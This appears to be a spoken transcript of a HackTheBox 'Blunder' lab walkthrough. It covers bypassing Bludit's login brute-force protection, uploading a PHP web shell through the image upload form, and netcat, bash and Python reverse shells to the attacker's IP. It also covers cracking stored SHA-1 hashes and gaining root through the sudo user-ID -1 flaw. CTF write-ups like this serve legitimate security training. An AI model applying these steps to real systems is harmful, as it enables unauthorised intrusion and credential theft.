What's up everyone? Today I'm doing Blunder from HackTheBox. This was a Linux box with an easy difficulty. We start this box off with our nmap scan and we find a web server running Bludit. We use cewl to create a word list that gets us logged into the application where we can execute code in a vulnerable image upload form. And once we're on the box, we find a password hash in the users.php file that we can crack to gain access to the user Hugo. And for root, we exploit a vulnerability in sudo, obtaining a root shell. So let's get started. Okay, we'll start this box off with nmap sv scoa, put it in the nmap directory, and we'll call it Blunder. And the IP address is 10.10.10.191. I've already run this, so let's take a look at the output. And we only see we have one port open. Port 21 is coming back as closed, so let's go take a look at Blunder on Apache. Okay, and we just kind of see a blog post here, or a few blog posts, nothing particularly interesting. Looking at the source code, there's not a whole lot of interesting links, just the blog posts and an about page, which pretty much looks the same. So we want to brute force directories and files. So I'm going to head over to op, where I keep sec lists. And we'll go into discovery, web content. And in here, there's a whole bunch of stuff. I'm going to take some directories out of Raft, and I'm going to take some files out of Raft. So what we'll do is we'll cat Raft medium files, and we'll do Raft medium directories, and we'll just call this Raft medium. And now we can just kind of run a fuzzer, so I'll just do fuff. The URL, which is http 10.10.10.191, where we're looking for files and directories, and the word list we're going to use, which is now Raft medium, and we'll just let this run for a while. Okay, so this has been running for a couple minutes, and it looks like we have a few 200 responses. We have a git ignore, and we have a todo.txt. We have an admin that's a 301, which is a redirect. So let's check out robots.txt, todo.txt, and see what we have. So looking at robots.txt, nothing important, and looking at todo.txt, we have some notes where it says remove old users, done, turn off the FTP, done, inform Fergus that the new blog needs images. So maybe we're looking for another host and we have a potential username. Okay, and looking at admin, we see Bludit. So looking at the source of this, looking for anything that says version, looks like we see 3.92. So if we head over to Google, we can search for Bludit 3.92 exploit, and we see CVE details. There is an RCE that might be useful for later. Authentication brute force mitigation bypass. Yeah, so it looks like brute force mitigation bypass might be a good thing to look at, because we do have a user, Fergus, from the todo.txt, and it looks like this is using x forwarded for password, and we've got a proof of concept here, so we can just kind of grab this and test it out. And we'll just call this brute.py. Okay, so this thing generates 50 incorrect passwords. We don't want that. Add the correct password. Don't want that. So this is it looks like it's taking in a word list as a password. So we could use something giant like RockU, or we could look at the blog, and each of these blog posts has a lot of words. So we can just use cewl, which is a word list generator based on a URL that'll just generate a bunch of unique words for us to use. So if we ran cewl on this URL, you can see we get a whole bunch of words, so we can just put this into a word list. And then if this fails, we could try RockU. So coming back over here, word list, I think we need to read in a file, so I think it's going to be, let's just look it up. We want to read this into a list. So we want to open file as f, content equals f.readlines. Like this. And then strip out any white space. Okay. So I'll just comment the rest of this out and just make sure that we can print all of the passwords. So for password and word list, we'll just try printing the password, see what happens. That's because this is an x.strip for x in word list. Okay, there we go. Okay, so print out the password's fine. It looks like it takes in a host, which we're just going to put in the IP since we don't have this Bludit path at the end. So that's going to be 10.10.10.191. And admin login, I believe, is the login page. So admin login. Yes. And the username we have is Fergus. So I'll just let this run. Missing parentheses. We don't need this password anymore. Or this print statement. So we'll just let this run, see if we get a positive match. Okay, so it looks like after a while we got a positive match for Roland Death Chain. So we can try to use this to log in with Fergus. And it lets us log in, so let's go ahead and put that in our notes. Okay, and looks like we have some notifications, but earlier we saw a code execution vulnerability in the upload function. So it looks like you just log in to any account, which allows you to edit content, upload a JPEG, modify it to a PHP file. So we can just kind of run through this and see if this vulnerability, it looks like it exists in our version, so we'll see if it's vulnerable. So following this guide, we just need to come over here, create some new content, upload an image. We have an evil image right here. It uploaded, so really what we need is we need to get our proxy going, bring it over here, turn intercept on, and now we can upload our evil image, and we'll send this to repeater. And kind of looking at the guide, it says we specify the location of the uploaded file by changing the value of the UUID. So here, we're going to want to change this. It looks like this person is changing it back to directories and creating a folder called temp. So if we go back to directories and just create a folder called temp and upload our image evil.png, it looks like it uploads successfully. So it looks like this is in BL content and then temp. So if we head here, can we go to BL content? We can, and it looks like we just created a temp directory. There's nothing in it. Doesn't like that. It doesn't list what's in there. But we could look at evil.png. Oh, it doesn't like that either. Okay, so maybe we need to create a new folder called temp. Try that one. And then heading back here, we see temp, and there's nothing in here either. Interesting. Okay, so we don't see TMP and then TEMP. So what if we just tried upload our image again? It says it's uploading just fine. And uploads, nothing there. Pages, nothing there. Okay, what if we go back one more, like that, and just try to upload the image directly to this directory? We don't see anything, not in temp. Okay. We can't seem to find the picture. This person goes back to and puts it in temp by just changing the UUID. We'll upload a JPEG. That seems to work just fine too. Creating a test folder. That's nothing. Is there a test folder in here? What if we go back 3? What if we go back 1? Okay, so this is at 348. But uploads changed a minute before that. Okay, so it put it in uploads and then temp. And then there's our evil.jpg. Okay, so it's actually going to uploads, temp. There's our test. There's our evil. Still don't see the evil.png though. Okay, so evil.jpg seems to write here just fine. Okay, so we'll stick with JPEG. Can we upload anything? Evil.foo. It says file type is not supported. Yeah, okay, it doesn't look like it. Okay, so if we went with evil.png or evil.jpg, let's just double check to make sure we're writing this correctly, and we'll call this evil2.jpg. And this is just going directly in the temp directory, so that should be here. Okay, so we'll send that. Image is uploaded, looking in the directory. Okay, now we have evil2. Okay, so we're on track. So it looks like we need to write a PHP file that's gonna write us a shell. So we can do that. So PHP file put contents, goes back one directory, so that would be here, and then it wants to put it in upload, so we only need to go back one directory to be in uploads. But we need to go back to, I guess, to hit uploads again, right? So we would be here, and then we would be in uploads. And we'll call this shell.php. And we want to give it PHP system get C. Close our PHP tag, close our quote, close our parentheses. Close our first PHP tag. And so that would be the file that we're writing to the image. And so we can call this one, I'll call this writer.jpg. And we'll send that and see what happens. Okay, so under temp, we should have writer. And we can't display it because it contains errors. So looking back at this exploit, it says upload an htaccess file. So we need to upload an htaccess file that says rewrite engine off, add type application x httpd php.jpg. And the name of it is .htaccess. Is it going to allow us to upload that? Okay, so we'll send that through. It says file type is not supported. Looking at writer. I guess I should type this correctly. HTTPD. Send that. File type is not supported. It's not working. Okay, so we definitely didn't get our shell. File name is htaccess. We're writing it to temp. Maybe it's 1. Okay. What if we go back to here? That's not right. Okay. Oh, it logged us out. Great. Admin, Fergus, Roland desk chain, and we're under VL content. Temp. It uploaded evil.foo to temp, the one I tried earlier. Interesting. Okay, and test, there's our evil.jpg. Okay, so that... Interesting. Okay, so our evil.foo uploaded, and it loads as an image. Where was our request for evil.foo? It was like right at the beginning, I thought. There it is. So it let me upload evil.foo to this directory. So if I did evil.foo 2, well wait, this is from the other login session. Okay, so we'll intercept this. I'll head back over to admin real quick. New content, intercept is on. Grab an image. Send this to repeater. Look at this one, and we'll call this evil.foo. So we go back to temp. What if we just wrote our PHP system get C, close our PHP tag, call this evil, or we'll call this foo.php, and send this. This file type's not supported. Turn our proxy off. We have our foo.php. Okay, so you don't even need to change the access file, it just uploads the PHP file anyway. So if we did c equals who am I, www data. Okay, perfect. So now we have code execution. So coming back over here, if we just netcat minus lvnp 1337, and we did c equals bin netcat minus e bin bash 10 10 14 33 1337, no callback. What if we throw it in quotes and we just got rid of bin? Okay, maybe it doesn't have the minus e option, so we'll head over to pentest monkey, grab a reverse shell. Yeah, that's fine. Okay, we'll try the bash. And 10 14 33. No callback. Right in quotes. No callback. Okay. Python. We can close these out. We'll do 10 10 14 33. And it looks like we finally got our callback. Okay, cool. So we'll just python minus c, import pty, pty.spawn, bin bash. I messed that up. Okay. Run that again. Python minus c, import pty, pty.spawn, bin bash. Perfect. Except I can't spell. Spawn, bin bash. There we go. Okay, now we have a better shell. Control Z, stty raw minus echo. Type foreground, hit enter twice. Okay, export term. Screen, clear. Okay. So now we have all that stuff. Perfect. Coming back, what do we have? And the root directory, it looks like we have an index PHP. So let's just find all files here that's name is star.php. Okay, so we have a lot. Okay, so we can do the same thing. We don't need anything footer. We don't need anything page. We don't need anything index. Okay, so we're left with some user class. This is all in BL kernel. BL themes, that's probably not important. So let's just do the same thing. Find here minus name is star.php, and we'll just completely grep out themes. Okay, there we go. So we have some database entries, or some files in our databases. So let's look at users.php, because maybe there is a user that's connecting to the database. Okay, so we see Fergus and Fergus's password, which we already have. We have admin. So this could be interesting. What users do we have on the box? Hugo and Sean. Who am I? www data. Okay, so we have a password hash, so I'll just put that there. Or we can actually run hash ID on this to see what it is. It's a SHA-1. So we can just run John on the hash, and we'll give it the word list, user share word list rocku.text. Not sure that it finished. John minus minus show hash 0 cracked. Okay, so if we head over to Google and SHA-1 lookup, on crack station, I'm not a robot, here are all the parking meters. Crack it. Looks like nothing is found. Okay, so maybe nothing in admin. Okay, so maybe nothing there. And looking back at this, we do have a salt. So let's see. If we add that, is this a valid hash? That's not stairs. Unrecognized hash format. So non-salted hashes, 1 per line. Okay, so it doesn't look like we're gonna find anything there. Looking in var, backups. Nothing in here. Anything in op? No. Okay, so I'm still inclined to believe that in here, oh, we have a 3.10a. Still that on the clipboard? No, that was the salt. Okay, what if we cat BL content? Or was it? Find here minus name, database, start. BL content databases. We have a users.php in here. And it looks like we have, okay, so we have some different users in here. We have Hugo in here, perfect. So let's do the same thing here, and we'll do hash, delete that, put in our new hash, see if this cracks. Didn't like that either. What if we did format SHA-1? Okay, what if we just pass it to crack station? All of this is a bus. What? Okay, we have more buses. I mean, that's a van. I don't know if I consider that a bus. So I'm not gonna click it. Okay. Alright, and then we get password 120. Okay, perfect. So can we swap over to Hugo? Throw in the password. Oh, we're Hugo, awesome. Okay, so in here, looks like we've completed user.text. And so starting enumeration from here, can we run anything as sudo? It looks like we can run everything, not root, bin bash. Okay, so looking at the version of sudo, it's 1.8.25 p1. So let's see if there's an exploit for this. So there's password feedback for 0.25. Buffer overflow. Serious flaw. That looks good. Okay, so this one's password feedback for someone that can run all. Okay. So looking at our permissions, in a little bit newer of a version, it looks like there is a local exploit for, so user hacker can run bin bash, can't run bin bash as root. With all specified, which it is, we can run the binary as any user. So running this essentially will drop us into a root shell because sudo doesn't check for the existence of the specified user ID, and -1 returns as a 0, which is root's ID. If we run this, who am I? We are root, dropping into root, root.text. That's it. So IP and host name. We've completed Blunder, and that's pretty much the box. I was not the biggest fan of the foothold on this box. I think a lot of people used Metasploit, but probably with good reason because it was super confusing where things were getting uploaded. But I mean, we got through it. So I hope y'all enjoyed the box. I'll catch you guys next week.